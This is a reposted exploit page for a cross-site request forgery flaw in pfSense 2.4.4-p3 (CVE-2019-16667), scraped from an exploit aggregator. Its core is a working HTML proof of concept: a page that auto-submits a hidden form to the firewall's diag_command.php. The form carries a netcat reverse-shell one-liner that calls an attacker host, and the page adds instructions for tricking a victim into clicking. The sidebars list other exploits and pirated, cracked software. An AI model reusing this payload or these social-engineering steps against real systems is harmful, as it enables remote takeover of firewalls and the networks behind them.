pfSense 2.4.4-p3 - Cross-Site Request Forgery Vulnerability exploit

3 years ago 168

BOOK THIS SPACE FOR AD

ARTICLE AD

## https://sploitus.com/exploit?id=1337DAY-ID-34755 # Exploit Title: pfSense 2.4.4-p3 - Cross-Site Request Forgery # Exploit Author: ghost_fh # Vendor Homepage: https://www.pfsense.org/ # Software Link: https://www.pfsense.org/download/index.html?section=downloads # Version: Till 2.4.4-p3 # Tested on: freebsd # CVE : CVE-2019-16667 # Vulnerability Description :- The pfsense firewall is vulnerable to RCE # chained with CSRF as it uses `csrf magic` library since it allows to tamper # the CSRF token values submitted when processing the form requests. Due to # this flaw, an attacker can exploit this vulnerability by crafting new page # that contains attacker's controlled input such as a "reverse shell" (eg: # `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip port # >/tmp/f`token value) in the form and entice the victims to click # on the crafted link via social engineering methods. Once the victim clicks # on the link (try again button in this case), the attacker can take the # lateral control of the victim's machine and malicious actions can be # performed on the victim's behalf. <!DOCTYPE html> <html> <body onload="document.createElement('form').submit.call(document.getElementById('myForm'))"> <form id="myForm" action="https://pfsense_ip/diag_command.php" method="POST"> <input type=hidden name="txtCommand" value="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1| nc attacker_ip attacker_port >/tmp/f"> <input type=hidden name="txtRecallBuffer" value="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attacker_ip attacker_port >/tmp/f"> <input type=hidden name="dlPath" value=""> <input type=hidden name="txtPHPCommand" value=""> <input type="hidden" name="submit" value="EXEC"> </form> </body> </html> # Create a malicious page containing the above values and once user clicks on malicious link, # he will be redirected to https://pfsense_ip/diag_command.php page. # Victim will be greeted with the "Try again" button. # Once victim clicks on the "Try again" button you will be greeted with reverse shell of the victim. # 0day.today [2020-07-27] #

Read Entire Article

LEFT SIDEBAR AD

pfSense 2.4.4-p3 - Cross-Site Request Forgery Vulnerability exploit

BOOK THIS SPACE FOR AD

Related

Exploit for Improper Authentication in Google Android exploit

Exploit for Vulnerability in Facade Ignition exploit

WordPress RSVPMaker 9.3.2 SQL Injection exploit

Taokeyun SQL Injection exploit

Xitami 2.5 Denial Of Service exploit

HaoKeKeJi YiQiNiu Server-Side Request Forgery exploit

Trending

Popular

1-click RCE in Electron Applications

Install waybackurls on Kali Linux

Over 40 Apps With More Than 100 Million Installs Found Leaking AWS Keys

Microsoft Office Professional Plus 2019 (x64 & x86) Multilingual + Pre-Activated

Install DalFox on Kali Linux

Adobe Master Collection CC 2022 v25.08.2022 (x64) Multilingual Pre-Activated

‘We are not motivated by profits’ – Open Bug Bounty maintainers on finding a niche in the crowdsourced AppSec market

Maxon CINEMA 4D Studio S22.123 (x64) Multilingual + Crack

Just Gopher It: Escalating a Blind SSRF to RCE for $15k

SketchUp Pro 2020 v20.2.172 (x64) Multilingual + Patch

BOOK THIS SPACE FOR AD